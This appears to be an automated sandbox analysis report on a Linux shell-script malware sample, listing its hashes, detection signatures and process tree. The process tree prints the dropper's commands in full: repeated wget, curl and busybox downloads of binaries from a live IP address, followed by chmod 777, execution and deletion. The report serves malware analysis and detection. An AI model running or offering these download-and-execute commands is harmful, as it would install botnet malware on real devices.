Analysis
-
max time kernel
67s -
max time network
69s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240611-en -
resource tags
arch:mipselimage:debian9-mipsel-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem -
submitted
28/10/2024, 02:19
Static task
static1
Behavioral task
behavioral1
Sample
2fe6e0a4b1a668bd4e323127aa964e409fbdb503359473b0988027781eb7ef86.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
2fe6e0a4b1a668bd4e323127aa964e409fbdb503359473b0988027781eb7ef86.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
2fe6e0a4b1a668bd4e323127aa964e409fbdb503359473b0988027781eb7ef86.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
2fe6e0a4b1a668bd4e323127aa964e409fbdb503359473b0988027781eb7ef86.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
2fe6e0a4b1a668bd4e323127aa964e409fbdb503359473b0988027781eb7ef86.sh
-
Size
10KB
-
MD5
a5a9f72ca25763058aacf1994a85b616
-
SHA1
748843de754f9484c22ebf1e32e5894d70f4859f
-
SHA256
2fe6e0a4b1a668bd4e323127aa964e409fbdb503359473b0988027781eb7ef86
-
SHA512
47f9975ff7556dfa8ceecd5af09a40a67e07ddd1478bfee1cbe1189d252b5fe35d0a098fa94c5aa6aa5694f33bb0b776685ddd59772184b7d42fa2a5d78e6cea
-
SSDEEP
192:oPTGhYwtdd5GFV2ER73e7jb18jgZPTGhYwDd5GFVW73e7jVIU:QgbEo18Uftx
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 752 chmod 908 chmod 920 chmod 884 chmod 896 chmod 926 chmod 932 chmod 944 chmod 962 chmod 828 chmod 866 chmod 980 chmod 878 chmod 890 chmod 968 chmod 740 chmod 746 chmod 815 chmod 860 chmod 974 chmod 914 chmod 789 chmod 809 chmod 872 chmod 902 chmod 938 chmod 950 chmod 956 chmod -
Executes dropped EXE 28 IoCs
ioc pid Process /tmp/aeZ1I1LsxuEp6u0P87DE71LG7JJLz5xn5X 741 aeZ1I1LsxuEp6u0P87DE71LG7JJLz5xn5X /tmp/i9ksxvnLd6fajtMl5LUucB6sIhiizloDAh 747 i9ksxvnLd6fajtMl5LUucB6sIhiizloDAh /tmp/uNEjMYe64knx1dYJIEKB1iZ5baoxnfzEkg 753 uNEjMYe64knx1dYJIEKB1iZ5baoxnfzEkg /tmp/Egt9NKccFkPDHfXbGWlmHRz45xRh6nCB9s 791 Egt9NKccFkPDHfXbGWlmHRz45xRh6nCB9s /tmp/im79ZRazVFZNLMhJsN8Kx8FhssRQsJgixA 810 im79ZRazVFZNLMhJsN8Kx8FhssRQsJgixA /tmp/43csAKZpPM1vTtgwnj4vGXU0GWkQTUcsaX 816 43csAKZpPM1vTtgwnj4vGXU0GWkQTUcsaX /tmp/UwKMbHwWCHMpBRpxW4SjIYXyGcqdiv8zva 830 UwKMbHwWCHMpBRpxW4SjIYXyGcqdiv8zva /tmp/TktFMHSwdoYnDlEuUthg5n3l4oubDIsnX8 861 TktFMHSwdoYnDlEuUthg5n3l4oubDIsnX8 /tmp/pB5ivXkbQcDrzxIFFStlGFBBDYRSJvtVSv 867 pB5ivXkbQcDrzxIFFStlGFBBDYRSJvtVSv /tmp/T0u8dMQce4Wyqahnpw1xuTxVky5LyZCOox 873 T0u8dMQce4Wyqahnpw1xuTxVky5LyZCOox /tmp/RF0s7iqOCcBJ5Be4RhRFou78giO121lOFl 879 RF0s7iqOCcBJ5Be4RhRFou78giO121lOFl /tmp/0tNEh30WjKMC9cmCxXOHkVu60gvaSzrYVZ 885 0tNEh30WjKMC9cmCxXOHkVu60gvaSzrYVZ /tmp/UKQGuVIS8a3pjf3WrK9MbVEPtykAp7S0y0 891 UKQGuVIS8a3pjf3WrK9MbVEPtykAp7S0y0 /tmp/kQxgz98PnxuQIwoP0GEXOc33Yv8XNdQXcn 897 kQxgz98PnxuQIwoP0GEXOc33Yv8XNdQXcn /tmp/i9ksxvnLd6fajtMl5LUucB6sIhiizloDAh 903 i9ksxvnLd6fajtMl5LUucB6sIhiizloDAh /tmp/uNEjMYe64knx1dYJIEKB1iZ5baoxnfzEkg 909 uNEjMYe64knx1dYJIEKB1iZ5baoxnfzEkg /tmp/Egt9NKccFkPDHfXbGWlmHRz45xRh6nCB9s 915 Egt9NKccFkPDHfXbGWlmHRz45xRh6nCB9s /tmp/im79ZRazVFZNLMhJsN8Kx8FhssRQsJgixA 921 im79ZRazVFZNLMhJsN8Kx8FhssRQsJgixA /tmp/aeZ1I1LsxuEp6u0P87DE71LG7JJLz5xn5X 927 aeZ1I1LsxuEp6u0P87DE71LG7JJLz5xn5X /tmp/43csAKZpPM1vTtgwnj4vGXU0GWkQTUcsaX 933 43csAKZpPM1vTtgwnj4vGXU0GWkQTUcsaX /tmp/UwKMbHwWCHMpBRpxW4SjIYXyGcqdiv8zva 939 UwKMbHwWCHMpBRpxW4SjIYXyGcqdiv8zva /tmp/TktFMHSwdoYnDlEuUthg5n3l4oubDIsnX8 945 TktFMHSwdoYnDlEuUthg5n3l4oubDIsnX8 /tmp/pB5ivXkbQcDrzxIFFStlGFBBDYRSJvtVSv 951 pB5ivXkbQcDrzxIFFStlGFBBDYRSJvtVSv /tmp/RF0s7iqOCcBJ5Be4RhRFou78giO121lOFl 957 RF0s7iqOCcBJ5Be4RhRFou78giO121lOFl /tmp/0tNEh30WjKMC9cmCxXOHkVu60gvaSzrYVZ 963 0tNEh30WjKMC9cmCxXOHkVu60gvaSzrYVZ /tmp/UKQGuVIS8a3pjf3WrK9MbVEPtykAp7S0y0 969 UKQGuVIS8a3pjf3WrK9MbVEPtykAp7S0y0 /tmp/kQxgz98PnxuQIwoP0GEXOc33Yv8XNdQXcn 975 kQxgz98PnxuQIwoP0GEXOc33Yv8XNdQXcn /tmp/T0u8dMQce4Wyqahnpw1xuTxVky5LyZCOox 981 T0u8dMQce4Wyqahnpw1xuTxVky5LyZCOox -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/UKQGuVIS8a3pjf3WrK9MbVEPtykAp7S0y0 curl File opened for modification /tmp/pB5ivXkbQcDrzxIFFStlGFBBDYRSJvtVSv curl File opened for modification /tmp/Egt9NKccFkPDHfXbGWlmHRz45xRh6nCB9s curl File opened for modification /tmp/im79ZRazVFZNLMhJsN8Kx8FhssRQsJgixA curl File opened for modification /tmp/i9ksxvnLd6fajtMl5LUucB6sIhiizloDAh curl File opened for modification /tmp/im79ZRazVFZNLMhJsN8Kx8FhssRQsJgixA curl File opened for modification /tmp/aeZ1I1LsxuEp6u0P87DE71LG7JJLz5xn5X curl File opened for modification /tmp/UwKMbHwWCHMpBRpxW4SjIYXyGcqdiv8zva curl File opened for modification /tmp/RF0s7iqOCcBJ5Be4RhRFou78giO121lOFl curl File opened for modification /tmp/T0u8dMQce4Wyqahnpw1xuTxVky5LyZCOox curl File opened for modification /tmp/aeZ1I1LsxuEp6u0P87DE71LG7JJLz5xn5X curl File opened for modification /tmp/kQxgz98PnxuQIwoP0GEXOc33Yv8XNdQXcn curl File opened for modification /tmp/i9ksxvnLd6fajtMl5LUucB6sIhiizloDAh curl File opened for modification /tmp/uNEjMYe64knx1dYJIEKB1iZ5baoxnfzEkg curl File opened for modification /tmp/0tNEh30WjKMC9cmCxXOHkVu60gvaSzrYVZ curl File opened for modification /tmp/UKQGuVIS8a3pjf3WrK9MbVEPtykAp7S0y0 curl File opened for modification /tmp/43csAKZpPM1vTtgwnj4vGXU0GWkQTUcsaX curl File opened for modification /tmp/RF0s7iqOCcBJ5Be4RhRFou78giO121lOFl curl File opened for modification /tmp/kQxgz98PnxuQIwoP0GEXOc33Yv8XNdQXcn curl File opened for modification /tmp/TktFMHSwdoYnDlEuUthg5n3l4oubDIsnX8 curl File opened for modification /tmp/Egt9NKccFkPDHfXbGWlmHRz45xRh6nCB9s curl File opened for modification /tmp/UwKMbHwWCHMpBRpxW4SjIYXyGcqdiv8zva curl File opened for modification /tmp/T0u8dMQce4Wyqahnpw1xuTxVky5LyZCOox curl File opened for modification /tmp/0tNEh30WjKMC9cmCxXOHkVu60gvaSzrYVZ curl File opened for modification /tmp/uNEjMYe64knx1dYJIEKB1iZ5baoxnfzEkg curl File opened for modification /tmp/TktFMHSwdoYnDlEuUthg5n3l4oubDIsnX8 curl File opened for modification /tmp/pB5ivXkbQcDrzxIFFStlGFBBDYRSJvtVSv curl File opened for modification /tmp/43csAKZpPM1vTtgwnj4vGXU0GWkQTUcsaX curl
Processes
-
/tmp/2fe6e0a4b1a668bd4e323127aa964e409fbdb503359473b0988027781eb7ef86.sh/tmp/2fe6e0a4b1a668bd4e323127aa964e409fbdb503359473b0988027781eb7ef86.sh1⤵PID:710
-
/bin/rm/bin/rm bins.sh2⤵PID:713
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/aeZ1I1LsxuEp6u0P87DE71LG7JJLz5xn5X2⤵PID:716
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/aeZ1I1LsxuEp6u0P87DE71LG7JJLz5xn5X2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:731
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/aeZ1I1LsxuEp6u0P87DE71LG7JJLz5xn5X2⤵PID:738
-
-
/bin/chmodchmod 777 aeZ1I1LsxuEp6u0P87DE71LG7JJLz5xn5X2⤵
- File and Directory Permissions Modification
PID:740
-
-
/tmp/aeZ1I1LsxuEp6u0P87DE71LG7JJLz5xn5X./aeZ1I1LsxuEp6u0P87DE71LG7JJLz5xn5X2⤵
- Executes dropped EXE
PID:741
-
-
/bin/rmrm aeZ1I1LsxuEp6u0P87DE71LG7JJLz5xn5X2⤵PID:742
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/i9ksxvnLd6fajtMl5LUucB6sIhiizloDAh2⤵PID:743
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/i9ksxvnLd6fajtMl5LUucB6sIhiizloDAh2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:744
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/i9ksxvnLd6fajtMl5LUucB6sIhiizloDAh2⤵PID:745
-
-
/bin/chmodchmod 777 i9ksxvnLd6fajtMl5LUucB6sIhiizloDAh2⤵
- File and Directory Permissions Modification
PID:746
-
-
/tmp/i9ksxvnLd6fajtMl5LUucB6sIhiizloDAh./i9ksxvnLd6fajtMl5LUucB6sIhiizloDAh2⤵
- Executes dropped EXE
PID:747
-
-
/bin/rmrm i9ksxvnLd6fajtMl5LUucB6sIhiizloDAh2⤵PID:748
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/uNEjMYe64knx1dYJIEKB1iZ5baoxnfzEkg2⤵PID:749
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/uNEjMYe64knx1dYJIEKB1iZ5baoxnfzEkg2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:750
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/uNEjMYe64knx1dYJIEKB1iZ5baoxnfzEkg2⤵PID:751
-
-
/bin/chmodchmod 777 uNEjMYe64knx1dYJIEKB1iZ5baoxnfzEkg2⤵
- File and Directory Permissions Modification
PID:752
-
-
/tmp/uNEjMYe64knx1dYJIEKB1iZ5baoxnfzEkg./uNEjMYe64knx1dYJIEKB1iZ5baoxnfzEkg2⤵
- Executes dropped EXE
PID:753
-
-
/bin/rmrm uNEjMYe64knx1dYJIEKB1iZ5baoxnfzEkg2⤵PID:754
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/Egt9NKccFkPDHfXbGWlmHRz45xRh6nCB9s2⤵PID:755
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/Egt9NKccFkPDHfXbGWlmHRz45xRh6nCB9s2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:759
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/Egt9NKccFkPDHfXbGWlmHRz45xRh6nCB9s2⤵PID:768
-
-
/bin/chmodchmod 777 Egt9NKccFkPDHfXbGWlmHRz45xRh6nCB9s2⤵
- File and Directory Permissions Modification
PID:789
-
-
/tmp/Egt9NKccFkPDHfXbGWlmHRz45xRh6nCB9s./Egt9NKccFkPDHfXbGWlmHRz45xRh6nCB9s2⤵
- Executes dropped EXE
PID:791
-
-
/bin/rmrm Egt9NKccFkPDHfXbGWlmHRz45xRh6nCB9s2⤵PID:793
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/im79ZRazVFZNLMhJsN8Kx8FhssRQsJgixA2⤵PID:795
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/im79ZRazVFZNLMhJsN8Kx8FhssRQsJgixA2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:805
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/im79ZRazVFZNLMhJsN8Kx8FhssRQsJgixA2⤵PID:808
-
-
/bin/chmodchmod 777 im79ZRazVFZNLMhJsN8Kx8FhssRQsJgixA2⤵
- File and Directory Permissions Modification
PID:809
-
-
/tmp/im79ZRazVFZNLMhJsN8Kx8FhssRQsJgixA./im79ZRazVFZNLMhJsN8Kx8FhssRQsJgixA2⤵
- Executes dropped EXE
PID:810
-
-
/bin/rmrm im79ZRazVFZNLMhJsN8Kx8FhssRQsJgixA2⤵PID:811
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/43csAKZpPM1vTtgwnj4vGXU0GWkQTUcsaX2⤵PID:812
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/43csAKZpPM1vTtgwnj4vGXU0GWkQTUcsaX2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:813
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/43csAKZpPM1vTtgwnj4vGXU0GWkQTUcsaX2⤵PID:814
-
-
/bin/chmodchmod 777 43csAKZpPM1vTtgwnj4vGXU0GWkQTUcsaX2⤵
- File and Directory Permissions Modification
PID:815
-
-
/tmp/43csAKZpPM1vTtgwnj4vGXU0GWkQTUcsaX./43csAKZpPM1vTtgwnj4vGXU0GWkQTUcsaX2⤵
- Executes dropped EXE
PID:816
-
-
/bin/rmrm 43csAKZpPM1vTtgwnj4vGXU0GWkQTUcsaX2⤵PID:817
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/UwKMbHwWCHMpBRpxW4SjIYXyGcqdiv8zva2⤵PID:818
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/UwKMbHwWCHMpBRpxW4SjIYXyGcqdiv8zva2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:819
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/UwKMbHwWCHMpBRpxW4SjIYXyGcqdiv8zva2⤵PID:822
-
-
/bin/chmodchmod 777 UwKMbHwWCHMpBRpxW4SjIYXyGcqdiv8zva2⤵
- File and Directory Permissions Modification
PID:828
-
-
/tmp/UwKMbHwWCHMpBRpxW4SjIYXyGcqdiv8zva./UwKMbHwWCHMpBRpxW4SjIYXyGcqdiv8zva2⤵
- Executes dropped EXE
PID:830
-
-
/bin/rmrm UwKMbHwWCHMpBRpxW4SjIYXyGcqdiv8zva2⤵PID:833
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/TktFMHSwdoYnDlEuUthg5n3l4oubDIsnX82⤵PID:834
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/TktFMHSwdoYnDlEuUthg5n3l4oubDIsnX82⤵
- Reads runtime system information
- Writes file to tmp directory
PID:842
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/TktFMHSwdoYnDlEuUthg5n3l4oubDIsnX82⤵PID:853
-
-
/bin/chmodchmod 777 TktFMHSwdoYnDlEuUthg5n3l4oubDIsnX82⤵
- File and Directory Permissions Modification
PID:860
-
-
/tmp/TktFMHSwdoYnDlEuUthg5n3l4oubDIsnX8./TktFMHSwdoYnDlEuUthg5n3l4oubDIsnX82⤵
- Executes dropped EXE
PID:861
-
-
/bin/rmrm TktFMHSwdoYnDlEuUthg5n3l4oubDIsnX82⤵PID:862
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/pB5ivXkbQcDrzxIFFStlGFBBDYRSJvtVSv2⤵PID:863
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/pB5ivXkbQcDrzxIFFStlGFBBDYRSJvtVSv2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:864
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/pB5ivXkbQcDrzxIFFStlGFBBDYRSJvtVSv2⤵PID:865
-
-
/bin/chmodchmod 777 pB5ivXkbQcDrzxIFFStlGFBBDYRSJvtVSv2⤵
- File and Directory Permissions Modification
PID:866
-
-
/tmp/pB5ivXkbQcDrzxIFFStlGFBBDYRSJvtVSv./pB5ivXkbQcDrzxIFFStlGFBBDYRSJvtVSv2⤵
- Executes dropped EXE
PID:867
-
-
/bin/rmrm pB5ivXkbQcDrzxIFFStlGFBBDYRSJvtVSv2⤵PID:868
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/T0u8dMQce4Wyqahnpw1xuTxVky5LyZCOox2⤵PID:869
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/T0u8dMQce4Wyqahnpw1xuTxVky5LyZCOox2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:870
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/T0u8dMQce4Wyqahnpw1xuTxVky5LyZCOox2⤵PID:871
-
-
/bin/chmodchmod 777 T0u8dMQce4Wyqahnpw1xuTxVky5LyZCOox2⤵
- File and Directory Permissions Modification
PID:872
-
-
/tmp/T0u8dMQce4Wyqahnpw1xuTxVky5LyZCOox./T0u8dMQce4Wyqahnpw1xuTxVky5LyZCOox2⤵
- Executes dropped EXE
PID:873
-
-
/bin/rmrm T0u8dMQce4Wyqahnpw1xuTxVky5LyZCOox2⤵PID:874
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/RF0s7iqOCcBJ5Be4RhRFou78giO121lOFl2⤵PID:875
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/RF0s7iqOCcBJ5Be4RhRFou78giO121lOFl2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:876
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/RF0s7iqOCcBJ5Be4RhRFou78giO121lOFl2⤵PID:877
-
-
/bin/chmodchmod 777 RF0s7iqOCcBJ5Be4RhRFou78giO121lOFl2⤵
- File and Directory Permissions Modification
PID:878
-
-
/tmp/RF0s7iqOCcBJ5Be4RhRFou78giO121lOFl./RF0s7iqOCcBJ5Be4RhRFou78giO121lOFl2⤵
- Executes dropped EXE
PID:879
-
-
/bin/rmrm RF0s7iqOCcBJ5Be4RhRFou78giO121lOFl2⤵PID:880
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/0tNEh30WjKMC9cmCxXOHkVu60gvaSzrYVZ2⤵PID:881
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/0tNEh30WjKMC9cmCxXOHkVu60gvaSzrYVZ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:882
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/0tNEh30WjKMC9cmCxXOHkVu60gvaSzrYVZ2⤵PID:883
-
-
/bin/chmodchmod 777 0tNEh30WjKMC9cmCxXOHkVu60gvaSzrYVZ2⤵
- File and Directory Permissions Modification
PID:884
-
-
/tmp/0tNEh30WjKMC9cmCxXOHkVu60gvaSzrYVZ./0tNEh30WjKMC9cmCxXOHkVu60gvaSzrYVZ2⤵
- Executes dropped EXE
PID:885
-
-
/bin/rmrm 0tNEh30WjKMC9cmCxXOHkVu60gvaSzrYVZ2⤵PID:886
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/UKQGuVIS8a3pjf3WrK9MbVEPtykAp7S0y02⤵PID:887
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/UKQGuVIS8a3pjf3WrK9MbVEPtykAp7S0y02⤵
- Reads runtime system information
- Writes file to tmp directory
PID:888
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/UKQGuVIS8a3pjf3WrK9MbVEPtykAp7S0y02⤵PID:889
-
-
/bin/chmodchmod 777 UKQGuVIS8a3pjf3WrK9MbVEPtykAp7S0y02⤵
- File and Directory Permissions Modification
PID:890
-
-
/tmp/UKQGuVIS8a3pjf3WrK9MbVEPtykAp7S0y0./UKQGuVIS8a3pjf3WrK9MbVEPtykAp7S0y02⤵
- Executes dropped EXE
PID:891
-
-
/bin/rmrm UKQGuVIS8a3pjf3WrK9MbVEPtykAp7S0y02⤵PID:892
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/kQxgz98PnxuQIwoP0GEXOc33Yv8XNdQXcn2⤵PID:893
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/kQxgz98PnxuQIwoP0GEXOc33Yv8XNdQXcn2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:894
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/kQxgz98PnxuQIwoP0GEXOc33Yv8XNdQXcn2⤵PID:895
-
-
/bin/chmodchmod 777 kQxgz98PnxuQIwoP0GEXOc33Yv8XNdQXcn2⤵
- File and Directory Permissions Modification
PID:896
-
-
/tmp/kQxgz98PnxuQIwoP0GEXOc33Yv8XNdQXcn./kQxgz98PnxuQIwoP0GEXOc33Yv8XNdQXcn2⤵
- Executes dropped EXE
PID:897
-
-
/bin/rmrm kQxgz98PnxuQIwoP0GEXOc33Yv8XNdQXcn2⤵PID:898
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/i9ksxvnLd6fajtMl5LUucB6sIhiizloDAh2⤵PID:899
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/i9ksxvnLd6fajtMl5LUucB6sIhiizloDAh2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:900
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/i9ksxvnLd6fajtMl5LUucB6sIhiizloDAh2⤵PID:901
-
-
/bin/chmodchmod 777 i9ksxvnLd6fajtMl5LUucB6sIhiizloDAh2⤵
- File and Directory Permissions Modification
PID:902
-
-
/tmp/i9ksxvnLd6fajtMl5LUucB6sIhiizloDAh./i9ksxvnLd6fajtMl5LUucB6sIhiizloDAh2⤵
- Executes dropped EXE
PID:903
-
-
/bin/rmrm i9ksxvnLd6fajtMl5LUucB6sIhiizloDAh2⤵PID:904
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/uNEjMYe64knx1dYJIEKB1iZ5baoxnfzEkg2⤵PID:905
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/uNEjMYe64knx1dYJIEKB1iZ5baoxnfzEkg2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:906
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/uNEjMYe64knx1dYJIEKB1iZ5baoxnfzEkg2⤵PID:907
-
-
/bin/chmodchmod 777 uNEjMYe64knx1dYJIEKB1iZ5baoxnfzEkg2⤵
- File and Directory Permissions Modification
PID:908
-
-
/tmp/uNEjMYe64knx1dYJIEKB1iZ5baoxnfzEkg./uNEjMYe64knx1dYJIEKB1iZ5baoxnfzEkg2⤵
- Executes dropped EXE
PID:909
-
-
/bin/rmrm uNEjMYe64knx1dYJIEKB1iZ5baoxnfzEkg2⤵PID:910
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/Egt9NKccFkPDHfXbGWlmHRz45xRh6nCB9s2⤵PID:911
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/Egt9NKccFkPDHfXbGWlmHRz45xRh6nCB9s2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:912
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/Egt9NKccFkPDHfXbGWlmHRz45xRh6nCB9s2⤵PID:913
-
-
/bin/chmodchmod 777 Egt9NKccFkPDHfXbGWlmHRz45xRh6nCB9s2⤵
- File and Directory Permissions Modification
PID:914
-
-
/tmp/Egt9NKccFkPDHfXbGWlmHRz45xRh6nCB9s./Egt9NKccFkPDHfXbGWlmHRz45xRh6nCB9s2⤵
- Executes dropped EXE
PID:915
-
-
/bin/rmrm Egt9NKccFkPDHfXbGWlmHRz45xRh6nCB9s2⤵PID:916
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/im79ZRazVFZNLMhJsN8Kx8FhssRQsJgixA2⤵PID:917
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/im79ZRazVFZNLMhJsN8Kx8FhssRQsJgixA2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:918
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/im79ZRazVFZNLMhJsN8Kx8FhssRQsJgixA2⤵PID:919
-
-
/bin/chmodchmod 777 im79ZRazVFZNLMhJsN8Kx8FhssRQsJgixA2⤵
- File and Directory Permissions Modification
PID:920
-
-
/tmp/im79ZRazVFZNLMhJsN8Kx8FhssRQsJgixA./im79ZRazVFZNLMhJsN8Kx8FhssRQsJgixA2⤵
- Executes dropped EXE
PID:921
-
-
/bin/rmrm im79ZRazVFZNLMhJsN8Kx8FhssRQsJgixA2⤵PID:922
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/aeZ1I1LsxuEp6u0P87DE71LG7JJLz5xn5X2⤵PID:923
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/aeZ1I1LsxuEp6u0P87DE71LG7JJLz5xn5X2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:924
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/aeZ1I1LsxuEp6u0P87DE71LG7JJLz5xn5X2⤵PID:925
-
-
/bin/chmodchmod 777 aeZ1I1LsxuEp6u0P87DE71LG7JJLz5xn5X2⤵
- File and Directory Permissions Modification
PID:926
-
-
/tmp/aeZ1I1LsxuEp6u0P87DE71LG7JJLz5xn5X./aeZ1I1LsxuEp6u0P87DE71LG7JJLz5xn5X2⤵
- Executes dropped EXE
PID:927
-
-
/bin/rmrm aeZ1I1LsxuEp6u0P87DE71LG7JJLz5xn5X2⤵PID:928
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/43csAKZpPM1vTtgwnj4vGXU0GWkQTUcsaX2⤵PID:929
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/43csAKZpPM1vTtgwnj4vGXU0GWkQTUcsaX2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:930
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/43csAKZpPM1vTtgwnj4vGXU0GWkQTUcsaX2⤵PID:931
-
-
/bin/chmodchmod 777 43csAKZpPM1vTtgwnj4vGXU0GWkQTUcsaX2⤵
- File and Directory Permissions Modification
PID:932
-
-
/tmp/43csAKZpPM1vTtgwnj4vGXU0GWkQTUcsaX./43csAKZpPM1vTtgwnj4vGXU0GWkQTUcsaX2⤵
- Executes dropped EXE
PID:933
-
-
/bin/rmrm 43csAKZpPM1vTtgwnj4vGXU0GWkQTUcsaX2⤵PID:934
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/UwKMbHwWCHMpBRpxW4SjIYXyGcqdiv8zva2⤵PID:935
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/UwKMbHwWCHMpBRpxW4SjIYXyGcqdiv8zva2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:936
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/UwKMbHwWCHMpBRpxW4SjIYXyGcqdiv8zva2⤵PID:937
-
-
/bin/chmodchmod 777 UwKMbHwWCHMpBRpxW4SjIYXyGcqdiv8zva2⤵
- File and Directory Permissions Modification
PID:938
-
-
/tmp/UwKMbHwWCHMpBRpxW4SjIYXyGcqdiv8zva./UwKMbHwWCHMpBRpxW4SjIYXyGcqdiv8zva2⤵
- Executes dropped EXE
PID:939
-
-
/bin/rmrm UwKMbHwWCHMpBRpxW4SjIYXyGcqdiv8zva2⤵PID:940
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/TktFMHSwdoYnDlEuUthg5n3l4oubDIsnX82⤵PID:941
-
-
